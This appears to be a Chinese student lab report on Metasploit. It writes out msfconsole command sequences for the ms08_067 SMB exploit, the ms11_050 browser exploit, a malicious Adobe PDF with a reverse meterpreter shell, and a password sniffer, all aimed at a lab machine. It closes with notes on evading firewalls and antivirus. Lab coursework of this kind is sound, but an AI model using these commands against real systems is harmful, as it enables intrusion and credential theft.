成功实现的有:
一个主动攻击实践,ms08_067
一个针对浏览器的攻击,ms11_050
一个针对客户端的攻击,Adobe(在实现这一步骤的时候有点小瑕疵,就是Adobe的版本问题换了三四个才成功)应用任何一个辅助模块
一、实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
-
-
一个主动攻击实践,如ms08_067;
-
一个针对浏览器的攻击,如ms11_050;
-
一个针对客户端的攻击,如Adobe;
-
- 成功应用任何一个辅助模块。(成功且唯一)
二、实验步骤
1、一个主动攻击实践
实现ms08_067
靶机为Win2000
- 在攻击机kali输入
msfconsole
进入控制台 - 输入如下指令:
- msf > use exploit/windows/smb/ms08_067_netapi //选择漏洞msf exploit(ms08_067_netapi) > show payloadsmsf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //选择载荷msf exploit(ms08_067_netapi) > set LHOST 10.0.0.110 //攻击机IPmsf exploit(ms08_067_netapi) > set LPORT 4324msf exploit(ms08_067_netapi) > set RHOST 10.0.0.112 //靶机IPmsf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高msf exploit(ms08_067_netapi) > exploit
-
输入
ipconfig
等指令可以获得靶机的信息 2、一个针对浏览器的攻击
ms11_050
- 在msf控制台中输入
search ms11_050
,搜索漏洞的相关信息 输入
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
,使用该漏洞- 依次输入如下指令
- set payload windows/meterpreter/reverse_tcp //选择载荷
-
3、一个针对客户端的攻击
(1)Adobe PDF阅读器
- 输入
search adobe
,查找漏洞- 输入
use windows/fileformat/adobe_cooltype_sing
,使用漏洞 - 输入以下指令:
- set payload windows/meterpreter/reverse_tcp //选择载荷
-
use exploit/multi/handler //进入监听模块
-
将生成的pdf放进靶机中,使用Adobe打开
-
在kali中看到回连成功
- 4、成功应用任何一个辅助模块
- 输入
cd /usr/share/metasploit-framework/modules/auxiliary
进入到目录中查看有什么辅助模块 我选择了
sniffer
嗅探器进行实验,进入目录后发现只有psnuffle.rb
,这是metasploit中的口令嗅探工具,只有在接入对方网络的初始访问点后才能进行嗅探- 在msf控制台中输入
use auxiliary/sniffer/psnuffle
,使用该漏洞- 设置了靶机IP地址后,输入
run
开始运行,可以看见捕获了上网的记录,渗透成功~ 三、实验总结
1、基础问题回答
- 用自己的话解释什么是exploit,payload,encode
exploit就是用于渗透攻击的工具,可以运送payload载体;
payload是载荷,在实验中就是一段shellcode代码,可以将恶意代码植入正常程序,具体执行攻击代码的模块;
encode是用于给恶意代码编码,进行伪装,实现面杀的工具。
2、离实战还缺些什么技术或步骤?
- meterpreter里面很多漏洞都已经是比较早之前的了,大多数有攻击价值的靶机都已经给有关漏洞打上补丁了,现实中不可能轻易利用这些漏洞攻击,所以需要获取最新漏洞情报。
- meterpreter虽然提供了很多payload,但是功能都已经固定,要是能自己编写实现特定功能的payload,这样的攻击会更有针对性。
- 大多数攻击都要关闭防火墙,但是实战中一般不会关掉防火墙,如何绕开防火墙也是重点。
-
四、心得与体会
-
我们当前阶段使用的模块都是先人发现了漏洞并只做好了的,单纯的调用一下而已,并且只对于比较旧版本的系统和应用有效,想用于实战的话我们还需要加强对受害者的分析以及攻击方式方面的学习。
-
- 设置了靶机IP地址后,输入
- 输入